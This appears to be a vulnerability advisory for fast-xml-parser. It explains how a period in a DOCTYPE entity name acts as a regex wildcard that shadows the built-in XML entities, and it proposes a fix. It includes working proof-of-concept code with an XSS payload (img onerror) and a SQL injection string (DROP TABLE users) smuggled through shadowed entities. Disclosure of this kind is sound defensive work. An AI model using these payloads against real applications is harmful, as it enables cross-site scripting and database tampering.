- "details": "# Entity encoding bypass via regex injection in DOCTYPE entity names\n\n## Summary\n\nA dot (`.`) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow the built-in XML entities (`&lt;`, `&gt;`, `&amp;`, `&quot;`, `&apos;`) with arbitrary values. This bypasses entity encoding and leads to XSS when the parsed output is rendered.\n\n## Details\n\nThe fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed `.` (period), which is valid in XML names per the W3C spec.\n\nIn `DocTypeReader.js`, entity names are passed directly to `RegExp()`:\n\n```js\nentities[entityName] = {\n  regx: RegExp(`&${entityName};`, \"g\"),\n  val: val\n};\n```\n\nAn entity named `l.` produces the regex `/&l.;/g`, where `.` matches **any character** (other than a line terminator), including the `t` in `&lt;`. Since DOCTYPE entities are replaced before built-in entities, this shadows `&lt;` entirely.\n\nThe same issue exists in `OrderedObjParser.js:81` (`addExternalEntities`) and in the v6 codebase: `EntitiesParser.js` has a `validateEntityName` function with a character blacklist, but `.` is not included:\n\n```js\n// v6 EntitiesParser.js line 96\nconst specialChar = \"!?\\\\/[]$%{}^&*()<>|+\"; // no dot\n```\n\n## Shadowing all 5 built-in entities\n\n| Entity name | Regex created | Shadows |\n|---|---|---|\n| `l.` | `/&l.;/g` | `&lt;` |\n| `g.` | `/&g.;/g` | `&gt;` |\n| `am.` | `/&am.;/g` | `&amp;` |\n| `quo.` | `/&quo.;/g` | `&quot;` |\n| `apo.` | `/&apo.;/g` | `&apos;` |\n\n## PoC\n\n```js\nconst { XMLParser } = require(\"fast-xml-parser\");\n\nconst xml = `<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n  <!ENTITY l. \"<img src=x onerror=alert(1)>\">\n]>\n<root>\n  <text>Hello &lt;b&gt;World&lt;/b&gt;</text>\n</root>`;\n\nconst result = new XMLParser().parse(xml);\nconsole.log(result.root.text);\n// Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>\n```\n\nNo special parser options are needed: `processEntities: true` is the default.\n\nWhen an app renders `result.root.text` in a page without escaping (e.g. `innerHTML`, template interpolation, SSR), the `onerror` handler of the injected `<img>` fires.\n\n`&amp;` can be shadowed too:\n\n```js\nconst xml2 = `<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n  <!ENTITY am. \"'; DROP TABLE users;--\">\n]>\n<root>SELECT * FROM t WHERE name='O&amp;Brien'</root>`;\n\nconst r = new XMLParser().parse(xml2);\nconsole.log(r.root);\n// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'\n```\n\n## Impact\n\nThis is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.\n\n- Default config, no special options\n- Attacker can replace any `&lt;` / `&gt;` / `&amp;` / `&quot;` / `&apos;` with arbitrary strings\n- Direct XSS vector when parsed XML content is rendered in a page\n- v5 and v6 both affected\n\n## Suggested fix\n\nEscape regex metacharacters before constructing the replacement regex:\n\n```js\nconst escaped = entityName.replace(/[.*+?^${}()|[\\]\\\\]/g, '\\\\$&');\nentities[entityName] = {\n  regx: RegExp(`&${escaped};`, \"g\"),\n  val: val\n};\n```\n\nFor v6, add `.` to the existing blacklist in `validateEntityName`:\n\n```js\nconst specialChar = \"!?\\\\/[]$%.{}^&*()<>|+\";\n```\n\n## Severity\n\nEntity decoding is a fundamental trust boundary in XML processing. This flaw undermines it completely in the default configuration, with no preconditions.",